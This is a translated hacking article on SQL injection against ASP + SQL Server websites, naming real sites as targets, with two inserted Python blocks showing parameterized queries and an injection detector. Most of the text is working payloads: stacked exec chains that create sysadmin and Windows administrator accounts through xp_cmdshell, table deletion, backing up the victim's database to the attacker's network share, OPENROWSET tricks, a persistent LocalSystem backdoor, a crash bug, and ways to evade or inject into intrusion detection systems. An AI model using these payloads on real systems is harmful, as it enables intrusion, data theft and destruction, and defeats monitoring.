Some attacks on SQL databases

xiaoxiao 2021-03-06

A simple intrusion and some crude damage to a database, using the Tianron site as the worked example

Many news, BBS and e-commerce sites are built on ASP + SQL, and the programmers writing the ASP are often fresh graduates, so ASP + SQL attacks have a fairly high success rate. This kind of attack has little to do with the NT version or the SQL Server version, and there is no patch for it, because the vulnerability is created by the programmer; the example source code in most books that teach ASP has it. All it takes is a few perfectly legal ASP requests to SQL, and the trouble is left behind!

This kind of attack grew out of the 'OR'1'='1 vulnerability (that is what we call it), which I think everyone knows by now. The next step is ;exec sp_addlogin Hax (adding a Hax user in the database), but this method is limited. First, the SQL Server account used by the ASP must be an administrator; second, the submitted request must land at the very end of the whole SQL statement, because some programmers query the database like this:

select * from news where id=... and topic=... and ...

If you reuse the example above against such a page,

news.asp?id=2;exec sp_addlogin Hax

turns into

select * from news where id=2; exec sp_addlogin Hax and topic=... and ...

The whole statement now has an AND condition hanging off the sp_addlogin stored procedure call, which is a syntax error, so your sp_addlogin naturally does not run. So try this instead:

news.asp?id=2;exec sp_addlogin Hax;--

The trailing -- turns the condition after sp_addlogin into a comment, so there is no syntax error and sp_addlogin executes normally!

So let's put it all together:

news.asp?id=2;exec master.dbo.sp_addlogin Hax;--

news.asp?id=2;exec master.dbo.sp_password null,Hax,Hax;--

news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin Hax;--

news.asp?id=2;exec master.dbo.xp_cmdshell 'net user Hax Hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators Hax /add';--

With that, you have left a Hax administrator account in both his database and his system.

Of course, the precondition is that the ASP uses the administrator account, so don't bother trying this against virtual hosting; there will be no such hole there.
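As an added illustration (not from the original article), here is the concatenation pattern the text describes beside the parameterized form that removes the problem. It is Python over an in-memory sqlite3 table that stands in for the site's SQL Server news table; the rows are constructed. sqlite3's execute() refuses a second stacked statement, unlike a SQL Server batch, so the block demonstrates the tautology case (the 'OR'1'='1 idea applied to a numeric id) rather than the ;exec chain:

```python
import sqlite3

# Constructed sample rows standing in for the site's news table.
SAMPLE_NEWS = [(1, "Opening"), (2, "Second item"), (3, "Third item")]


def make_db():
    """Build an in-memory table; sqlite3 stands in for SQL Server here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, topic TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", SAMPLE_NEWS)
    return conn


def lookup_concatenated(conn, news_id):
    """The pattern the article attacks: the request value is pasted into the
    statement text, so whatever follows the number is parsed as SQL."""
    sql = "SELECT id, topic FROM news WHERE id = " + news_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, news_id):
    """Hardened form: validate the type, then bind the value as a parameter.
    The value can never change the statement's structure."""
    news_id = int(news_id)  # raises ValueError on anything but an integer
    return conn.execute(
        "SELECT id, topic FROM news WHERE id = ?", (news_id,)
    ).fetchall()


def demo():
    """Run both lookups on a normal id and on a tautology payload."""
    conn = make_db()
    normal = "2"
    tautology = "2 OR 1=1"  # the 'OR'1'='1 idea applied to a numeric id
    results = {
        "concat_normal": lookup_concatenated(conn, normal),
        "concat_tautology": lookup_concatenated(conn, tautology),
        "param_normal": lookup_parameterized(conn, normal),
    }
    try:
        lookup_parameterized(conn, tautology)
        results["param_tautology"] = "executed"
    except ValueError:
        results["param_tautology"] = "rejected"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The concatenated lookup returns every row for the tautology input, while the parameterized lookup rejects it before it reaches the database; the same binding would also reduce the article's ;exec payloads to an ordinary string value.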

We will discuss later how to break in when the other side's ASP does not use the SQL administrator account; of course that will also involve intruding through port 1433.

And of course everyone can try appending a ' to id=2, mainly to see how the other side's ASP is written.


Now let's talk about what to do when the SQL account used by the ASP program is not an administrator.

Take the Tianron homepage, for instance; it has news content like this:

http://www.talentit.com.cn/news/news-2.asp?newid=117

You can try

Http://www.talent.com.cn/news/news-2.asp?newid=117;select 123;--

Oh, an error is reported: SELECT 123 failed. Obviously Tianron's ASP closes the newid variable with a ' character.

So try

http://www.talentitit.com.cn/news/news-2.asp?newid=117';delete news;--

Haha, I think as long as the table name is guessed right, the news table gets deleted.

Usually, when the SQL account for the ASP is not an administrator, it will be the owner of a database, or at least have high privileges on that database.

But how do we know which database? Take a look at the db_name() function.

Open your Query Analyzer and run print db_name(); huh, the current database name comes out.

Pushing it further:

declare @a sysname; set @a=db_name(); backup database @a to disk='\\your_ip\your_share\bak.dat', name='test';--

Oh, his current database is now backed up onto your hard drive. I'll leave the rest for everyone to work out.

Similarly, this method can find the other side's SQL Server IP.

First install a firewall and turn on alerts for ICMP and for TCP 139 and 445.

Then try news.asp?id=2;exec master.dbo.xp_cmdshell 'ping your_ip'

If the firewall reports that someone is pinging you, you can be sure the other side's ASP runs with SQL administrator privileges, and you have also pinned down the exact location of his SQL Server. Many larger sites separate the web server from the database server for performance, and when you cannot see the source code I think this is the only way to locate where the other side's SQL Server is.

So what if the other side's ASP does not have SQL administrator privileges and we cannot call xp_cmdshell? What then?

Don't worry, try this: news.asp?id=2;declare @a sysname; set @a=db_name(); backup database @a to disk='\\your_ip\your_share\bak.dat', name='test';--

Oh, your firewall should warn that someone is connecting to your port 445 or 139 (the Win9x port), so the other side's SQL Server IP is exposed that way too.

And what if the other side is not even the owner? Next time I'll tell you a better way.

Actually, backing up the database onto your own hard drive is a bit much. If the other side's database is very large and you are on dial-up, huh, I'd advise you not to try; it is hard to transfer successfully.

Next time we will talk about how to fool IDS while carrying out ASP + SQL intrusions.

Some good IDSs have started monitoring for the xp_cmdshell keyword.

OK, comrades, see you next time.

For all the URLs above I hope you submit them through VBScript, because the browser's address bar blocks some special characters, so your command would not be transferred in full:

window.location.href = URL

Supplement: this issue has also been raised online, but only the simple xp_cmdshell call, which is very limited; in fact there are many places worth digging into. For example, Guosen (www.guosen.com.cn) has this problem. They use Microsoft's three-tier structure, and xp_cmdshell calls and strings are filtered, but I tried, and with SQL Server's heterogeneous queries you can still open the Telnet service and get into the Administrators group on the other side's machine! Since the other side's firewall is very strict (a Checkpoint filtering packets, with only port 80 open), getting his database structure is harder, but there is still a way :P

By the way, pay attention to SQLOLEDB, DB_NAME, OPENROWSET and OPENDATASOURCE. These system functions are very useful when the ASP's SQL Server account is just an ordinary user!


SQL Server new vulnerabilities and some breakthroughs

Below I'll talk about some new SQL Server bugs. I worked hard on these, with a little luck of course; having found them I don't dare enjoy them alone, so I'm putting them out for everyone to check. Some masters have surely known them for a long time; after all I've been working with SQL Server for less than a year :P

1. About OPENROWSET and OPENDATASOURCE

Maybe this trick already exists: using OPENROWSET to send a local command.

The usual usage (including MSDN's examples) is

select * from openrowset('sqloledb', 'myserver';'sa';'', 'select * from table')

As you can see (even from the name), OPENROWSET is just a quick way to access a remote database, and it must follow a SELECT, that is, it must return a recordset.

So can we use it to call xp_cmdshell? The answer is yes!

select * from openrowset('sqloledb', 'server';'sa';'', 'set fmtonly off exec master.dbo.xp_cmdshell ''dir c:\''')

You must add set fmtonly off to turn off the default of returning only column metadata; then the result set returned by xp_cmdshell is handed to the outer SELECT and displayed. With the default setting an empty set comes back, the SELECT errors, and the command is not executed.

And if we want to call sp_addlogin, which, unlike xp_cmdshell, returns no result set at all, we cannot rely on FMTONLY; instead do this:

select * from openrowset('sqloledb', 'server';'sa';'', 'select ''OK!'' exec master.dbo.sp_addlogin hectic')

This way the command returns at least the result set of select 'OK!', your machine displays OK!, and the other side's database gains a hectic account. That is, we use select 'OK!' to return a set that fools the local SELECT request, so the command executes normally. The same trick works for sp_addsrvrolemember, and OPENDATASOURCE can do it too! Everyone will agree this method is really useful :P

2. A problem with MSDASQL

I don't know whether you have tried connecting to a remote database with MSDASQL. Of course this API can only be called by a SQL Server administrator. Run the following:

select * from openrowset('msdasql', 'driver={SQL Server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn', 'select * from table1 select * from table2')

When table1 and table2 have different numbers of columns, you will find that the other side's SQL Server crashes; even local connections fail and system resources are tied up, and after killing the SQL Server process with pskill, SQL Server will not start normally, or keeps hitting illegal operations, until the machine is restarted. I happened to find this bug and have not seen it discussed anywhere. What is strange is that it only shows up with MSDASQL; SQLOLEDB has no such problem. So it seems the problem is not the mismatch between the number of result sets expected and returned, but MSDASQL itself. As for the specific cause, let's study it together :P

3. A terrible back door

I once saw someone online say that leaving a back door in SQL Server can be done by adding a trigger or a job, or by rewriting sp_addlogin and sp_addsrvrolemember; these methods are of course feasible, but they are easy to find. I don't know whether you have thought about SQLOLEDB's local connection mapping. For example, suppose you have run the following command on the other side's SQL Server with a SQL Server administrator account:

select * from openrowset('sqloledb', 'trusted_connection=yes;data source=hectic', 'set fmtonly off exec master..xp_cmdshell ''dir c:\''')

This creates a local connection mapping named hectic on the other side's SQL Server, and as long as SQL Server is not restarted the mapping stays. At least I don't yet know how to find a connection mapping planted by someone else.

OK, after the command above has run, you will find that even an account with no permissions at all on SQL Server can run it just as you did! And the permissions are LocalSystem (default installation), huh! This method can be used to leave a back door in a SQL Server that has already been compromised with administrator privileges.

The above method works on SQL Server 2000 and SQL Server 2000 SP1!

* There is another guess. I don't know whether you have paid attention to the two DSNs that ship with Windows, one called LocalServer and one called MSQi. Both connect to SQL Server with the local administrator account. If the other side's SQL Server is started under a custom Power User, then sa's permissions equal those of a Power User and it is hard to do much, but with the following command

select * from openrowset('msdasql', 'DSN=LocalServer;trusted_connection=yes', 'set fmtonly off exec master..xp_cmdshell ''dir c:\''')

it should be possible to connect to the local SQL Server with LocalServer's administrator account and then run local commands with that account's permissions. So I think this should be able to break out of sa's Power User permissions. The problem now is that SQLOLEDB cannot call a DSN connection, and MSDASQL cannot be called by non-administrators, so I am looking for a way for guest to call MSDASQL. If anyone knows how to break through this, or has a new idea, we can discuss it together. If this could be used successfully by guest it would be a very serious security hole, because any of the SQL statements mentioned earlier can be submitted to the other side's ASP to execute for us :P

Use T-SQL to deceive IDS or attack IDS

IDS today are getting smarter and smarter. Some have added monitoring for xp_cmdshell and sp_addlogin. But after all there is no real artificial intelligence in there, and this monitoring can always be fooled.

First, deceiving IDS:

Since the IDS monitors the xp_cmdshell keyword, we can do this:

declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'

This code everyone understands. Also, xp_cmdshell is a stored procedure with a fixed id number in the master library, so we can also do this. Suppose the id is 988456:

declare @a sysname select @a=name from sysobjects where id=988456 exec @a 'dir c:\'

or of course

declare @a sysname select @a=name from sysobjects where id=988455+1 exec @a 'dir c:\'

There are endless permutations of this approach, and IDS cannot cover them all.

sp_addlogin can be handled the same way.

Now, attacking IDS:

Because IDS log volume is large, the logs are usually saved to a regular database such as SQL Server. If it used the old RecordSet.AddNew approach, IDS performance would suffer badly, so T-SQL requests are made through ADO, which is not only efficient but also lets some of the work be handed to SQL Server.

Usually the program is written like this:

insert table values('log content', ...)

So I thought, what if we use

temp') exec xp_cmdshell 'dir c:\'--

After submission it becomes

insert table values('log content' ... 'temp') exec xp_cmdshell 'dir c:\'--')

and xp_cmdshell runs inside the IDS's database :)

Of course, the IDS is a sniffer; it catches everything on the wire, and what the browser submits has its spaces changed to %20, so %20 would be passed to SQL Server and your command would not execute.

The only way is

insert/**/table/**/values('log content' ... 'temp')/**/exec/**/xp_cmdshell/**/'dir c:\'/**/--')

Use /**/ instead of spaces as the separator, and your T-SQL executes inside the IDS database.

Other statements can be used too; you can do damage, or back up the IDS database to your shared directory. Ha ha.

Actually the principle of this method is the same; just turn spaces into /**/. The original ASP was a SELECT statement, so a ' was used to close it; now the IDS uses an INSERT statement, so ') is used to close it.

OK, many other new intrusion statements can be worked out slowly; the best testing tool is Query Analyzer.
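As an added defensive example (not from the original article), here is a small normalizer and classifier in Python that undoes the three evasions this section describes (%20 encoding, /**/ used as a spacer, and 'xp_'+'cmdshell' string concatenation) before looking for the keywords the article's earlier sections rely on (xp_cmdshell, sp_addlogin, sp_addsrvrolemember, sp_password, openrowset, opendatasource, backup database). It also flags exec @variable and sysobjects name lookups, which survive every literal-keyword rewrite, and stacked statements after a ;. The request lines are constructed to match the shapes shown on this page; they are not real traffic:

```python
import re
from urllib.parse import unquote

# Constructed request lines in the shape of this page's URLs; not real traffic.
SAMPLE_REQUESTS = [
    "GET /news.asp?id=2 HTTP/1.0",
    "GET /news.asp?id=2;exec%20master.dbo.xp_cmdshell%20'dir%20c:\\';-- HTTP/1.0",
    "GET /news.asp?id=2;declare%20@a%20sysname%20set%20@a='xp_'+'cmdshell'%20exec%20@a%20'dir' HTTP/1.0",
    "GET /news.asp?id=2;declare%20@a%20sysname%20select%20@a=name%20from%20sysobjects%20where%20id=988455+1%20exec%20@a%20'dir' HTTP/1.0",
    "POST /log.asp body=temp')/**/EXEC/**/XP_CMDSHELL/**/'DIR%20C:\\'/**/-- HTTP/1.0",
    "GET /news.asp?id=2;select%20*%20from%20openrowset('sqloledb','trusted_connection=yes;data%20source=hectic','select%201') HTTP/1.0",
]

# Keywords named on this page; matched only after normalization.
DANGEROUS = ("xp_cmdshell", "sp_addlogin", "sp_addsrvrolemember", "sp_password",
             "openrowset", "opendatasource", "backup database")

# Shapes that hide the keyword from a literal match.
INDIRECT_EXEC = re.compile(r"\bexec\s+@\w+", re.I)         # exec @a '...'
SYSOBJECTS_LOOKUP = re.compile(r"\bfrom\s+sysobjects\b", re.I)
STACKED_TAIL = re.compile(r";\s*(exec|declare|select|insert|delete|backup)\b", re.I)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")         # 'xp_'+'cmdshell'


def normalize(raw):
    """Undo the evasions before keyword matching."""
    s = unquote(raw)                      # %20 -> space (unquote keeps '+' literal)
    s = re.sub(r"/\*.*?\*/", " ", s)      # /**/ spacer, and any real comment
    while True:                           # merge 'a'+'b'+'c' pairwise until stable
        merged = CONCAT.sub(r"'\1\2'", s)
        if merged == s:
            break
        s = merged
    return re.sub(r"\s+", " ", s).lower()


def classify(raw):
    """Return the list of findings for one request line (empty if clean)."""
    s = normalize(raw)
    hits = [k for k in DANGEROUS if k in s]
    if INDIRECT_EXEC.search(s):
        hits.append("exec-via-variable")
    if SYSOBJECTS_LOOKUP.search(s):
        hits.append("sysobjects-name-lookup")
    if STACKED_TAIL.search(s):
        hits.append("stacked-statement")
    return hits


def scan(lines=SAMPLE_REQUESTS):
    """Map each request line to its findings."""
    return {line: classify(line) for line in lines}


if __name__ == "__main__":
    for line, findings in scan().items():
        print(findings or "clean", "<-", line[:70])
```

Normalizing before matching is what makes the sysobjects id trick and the /**/ spacing visible to the same rule set; a detector that only looks for the literal string xp_cmdshell in the raw request misses four of the five hostile lines above.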

Please credit the original address when reposting: https://www.9cbs.com/read-116293.html
